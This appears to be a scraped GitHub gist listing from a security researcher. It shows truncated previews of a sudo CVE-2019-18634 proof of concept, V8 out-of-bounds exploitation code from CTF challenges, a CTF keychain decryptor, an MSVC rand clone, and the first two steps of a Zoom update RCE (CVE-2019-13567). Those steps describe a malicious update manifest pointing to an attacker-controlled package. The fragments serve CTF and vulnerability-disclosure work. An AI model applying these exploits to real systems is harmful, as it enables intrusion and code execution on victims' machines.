
@wbowling
wbowling / CVE-2019-18634.py
Last active September 8, 2020 23:03
POC for CVE-2019-18634
#!/usr/bin/python
import os
import pty
from pwn import process, sleep, write, read, listen, p64
"""
From https://github.com/sudo-project/sudo/blob/SUDO_1_8_30/src/tgetpass.c#L401:
} else if (c == sudo_term_kill) {
@wbowling
wbowling / babyjs.js
Created April 20, 2019 11:45
TG:HACK 2019 - Baby's First JavaScript Exploitation
let oob_arr = [1.1, 0x61616161, 3.3];
function getSetValue(i, v) {
    if (v) {
        oob_arr[i] = v;
    } else {
        return oob_arr[i];
    }
}
@wbowling
wbowling / pwn.js
Last active April 20, 2021 21:42
starCTF (*CTF) 2019 oob-v8
// uses https://github.com/saelo/jscpwn/blob/master/utils.js
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
let f = wasm_mod.exports.hello;
var arr1 = [1.1];
var arr2 = [Date];
var arr_map1 = arr1.oob();
var arr_map2 = arr2.oob();
@wbowling
wbowling / 0_reuse_code.js
Last active April 20, 2021 21:43
Here are some things you can do with Gists in GistBox.
// Use Gists to store code you would like to remember later on
console.log(window); // log the "window" object to the console
@wbowling
wbowling / rand.py
Created February 21, 2018 00:44
microsoft c runtime implementation of rand srand in python
#!/usr/bin/env python
seed = 1  # the CRT's holdrand starts at 1 until srand() is called

def srand(s):
    global seed
    seed = s

# microsoft c runtime implementation
def rand():
    global seed
    # LCG step; the CRT keeps a 32-bit state, but bits 16..30 of the
    # 64-bit value below are identical, so the output matches
    seed = (seed * 214013 + 2531011) % 2**64
    return (seed >> 16) & 0x7fff
@wbowling
wbowling / decrypt.py
Last active October 1, 2021 17:13
Decryptor for signalino - Midnight Sun CTF 2021
#!/usr/bin/env python3
"""
Based on https://github.com/xperylabhub/ios_keychain_decrypter/blob/d7f3089067816cd2adc1ce910c9e1b927a356f37/keychain_decrypt.py#L113
"""
import plistlib
from bpylist import archiver, archive_types
import dataclasses
from Crypto.Cipher import AES
@wbowling
wbowling / README.md
Last active January 1, 2022 22:33
Zoom RCE - CVE-2019-13567

POC - https://youtu.be/zGSLBDo3N7s

  1. Create a malicious update manifest with the Package-url pointing to a server you control:
Check-sum=11111111111111111111111111111111;Check2-sum=11111111111111111111111111111111;Update-Option=1;Current-version=5.4.53932.0709;Download-root=https://aw.rs/z;Package-url=https://aw.rs/z/5.4.53932.0709/zoomusInstaller.pkg?t=atupg;Package-name=zoomusInstaller.pkg;Installer-name=;ahcab-name=airhost.zip;sipcab-name=sipcall.zip;codesnippet-name=codesnippet_mac.zip;fullcab-name=zoomusInstallerFull.pkg;
  2. Upload the manifest to a .zoom.us domain; one example is as the icon for a new https://marketplace.zoom.us/ app (there are client-side checks to see if it's an image, but they can be bypassed): https://marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg